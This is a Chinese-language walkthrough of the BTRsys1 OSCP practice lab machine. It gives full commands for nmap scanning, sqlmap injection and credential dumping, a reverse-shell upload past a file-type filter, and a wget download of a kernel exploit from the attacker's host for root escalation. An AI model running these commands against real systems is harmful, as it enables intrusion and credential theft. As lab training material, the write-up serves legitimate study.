OSCP系列靶机—BTRsys1

一、主机发现

image-20240722153014361

二、端口探测

1、快速扫描

image-20240722153056004

2、全端口扫描

image-20240722153129282

共开放三个端口

3、漏洞探测

1
nmap --script=vuln -p 21,22,80 192.168.31.72

上面给出了端口对应的服务信息,就不再进行服务版本探测了

image-20240722153235844

ftp 存在任意用户登陆,其他端口没啥信息

image-20240722153311271

三、FTP信息收集

image-20240722153520227

啥也没有,不应该啊;尝试文件上传

image-20240722153652206

权限被拒绝,无法上传

四、HTTP信息收集

1、首页及源代码

image-20240722153815998

他这里还一直在转圈圈,加载慢了很,估计是后端有一直在执行的操作;看源代码

image-20240722154006002

噢,我说怎么加载这么慢,原来是css、js等请求了外部链接;纵观这个源代码,只有a标签的hakkimizda.php链接是我们感兴趣的

2、hakkimizda.php 文件

image-20240722154331817

这里疑似有文件包含的嫌疑,它的头部跟首页是一样的;把这段话拿给AI解析下

image-20240722154607262

是一段土耳其语言说的一段话,后面的渗透测试步骤这里似乎给了提示,不知道是否与此靶场有关

image-20240722154735567

3、做目录扫描

到这里基本上没线索了,做一遍目录扫描

image-20240722155256963

倒是发现几个有趣的文件和文件夹;挑有价值的讲一下

4、login.php 文件

image-20240722155731439

本想尝试下弱口令,但是发现这个地方没有走后端;校验是在前端中

image-20240722160028558

看源代码;原来是在前端先校验了下用户名中@后面是不是btrisk.com,符合要求才向后端提交

image-20240722160157681

我们随便用一个账号如 123@btrisk.com 任意密码,来到了后端的personel.php文件

image-20240722160643305

这里有个报错,说缺少参数;下面没有显示具体的字段信息;应该是用户名符合要求所以进来这个页面,但是因为密码不正确所以没有添加上必要的参数;既然如此,用sqlmap 跑一下看是否存在sql注入漏洞

5、SQL注入漏洞

1
sqlmap -u http://192.168.31.72/personel.php --data "kullanici_adi=admin@btrisk.com&parola=123456" --batch

image-20240722161550783

OK,结果也是非常明显,存在SQL注入,那查看用户的信息

当我们查到字段的时候,发现有这么些字段,看哪个字段呢?

image-20240722161752570

在登录框中已经给出了答案

image-20240722161726319

1
sqlmap -u http://192.168.31.72/personel.php --data "kullanici_adi=admin@btrisk.com&parola=123456" --batch -D "deneme" -T "user" -C "Kullanici_Adi,Parola" --dump

image-20240722161902674

俩用户,密码都一样的昂

6、登陆后台

登陆之后,后台果然变了,有文件上传

image-20240722162028206

五、Getshell

本想上传一个txt文件试试水,但给我拦截了,说只能jpg,png格式

image-20240722162204112

我把txt 后缀改成jpg,继续上传

image-20240722162332979

上传成功,但是没给路径;欸,这个时候想起来做目录扫描中发现的/uploads/目录了,去看下

image-20240722162420803

果然在这里;那上传php 反弹shell 文件;注意改成自己的IP和端口

image-20240722162536677

上传用bp 抓包改后缀

image-20240722162724345

访问webshell,并用nc 进行监听,成功getshell

image-20240722162851050

六、权限提升

1、信息收集

image-20240722163226329

发现数据库的账号码,而且还是root 高权限用户

image-20240722163957837

但是运行mysql 的用户是mysql,依然是低权限用户,无法通过数据库进行提权;但是看到这个linux 的内核版本较低,是否可以使用脏牛提权呢?

2、脏牛提权至root

查询有关该内核版本提权的脚本

image-20240722164254080

有俩,感觉能成功,尝试第一个

image-20240722164507055

脚本上写了食用方法,照着来就行,将脚本上传至靶机后编译运行

1
2
3
4
// 攻击机
python3 -m http.server
// 靶机
cd /tmp;wget http://192.168.31.58:8000/37292.c

image-20240722165100748

欸,没有gcc 文件,那用cc ;把这里的gcc 改成 cc;之后重新来一遍

image-20240722172104166

1
2
//cc执行
cc 37292.c -o ofs

image-20240722172408177

提权成功

image-20240722172430686